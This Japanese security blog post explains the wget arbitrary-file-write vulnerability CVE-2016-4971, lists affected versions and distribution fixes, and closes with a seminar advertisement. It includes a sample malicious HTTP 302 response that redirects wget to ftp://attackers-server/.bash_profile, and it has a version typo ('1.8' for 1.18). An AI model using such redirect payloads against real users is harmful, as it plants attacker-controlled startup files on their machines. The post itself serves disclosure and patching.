wgetに任意のファイルを書き込むことが可能になる脆弱性(CVE-2016-4971)
こんにちは。SIOS OSSエバンジェリスト/セキュリティ担当の面です。
少し古い情報ですが、6月9日にwget-1.8がリリースされました。7/6にdebian/ubuntuの方も対応が完了していますので、今回はこの脆弱性についてまとめてみます。
関連するCVE
CVE-2016-4971
Priority
High
影響するバージョン
wget-1.18未満のバージョン
CVE概要(詳細はCVEのサイトをご確認ください)
wgetにより任意のファイルに書き込まれる可能>性
重要度 – High
wgetの制御が不十分なため、wgetでファイルをダウンロードしようとした際に、攻撃者が接続対象のサーバを攻撃して下記のような不正なレスポンスを返した際には
HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=UTF-8 Location: ftp://attackers-server/.bash_profile Content-Length: 262 Server: Apache
wgetが自動的にattackers-serverにリダイレクトされ、.bash_profileファイルを悪意のあるFTPサーバからダウンロードしてしまうことになります。
これを利用して、攻撃者はwgetで接続してきたユーザのPC上に任意のファイルを書き込むことが可能になります。
主なディストリビューションの対応方法
詳細は、各ディストリビューションの提供元にご確認ください
debian
Red Hat Enterprise Linux/CentOS
OpenSUSE
ubuntu
http://people.canonical.com/%7Eubuntu-security/cve/2016/CVE-2016-4971.html
対処方法
各ディストリビューションの案内に従い、アップデートを行ってください。全てのRed Hat製品でパッチが行き渡っているかを確認するには、Red Hat Satelliteを使うと管理が便利でしょう。
7/22にノベル株式会社様と共催で「クラウド・OSSセキュリティセミナー」と題して、OpenStack基盤自体のセキュリティに関して、デモを交えたセミナーを行います。
https://sios.secure.force.com/webform/SeminarDetail?id=70110000000sotpAAAがプログラム内容と申し込みの
詳細になりますので、是非お申し込み下さい。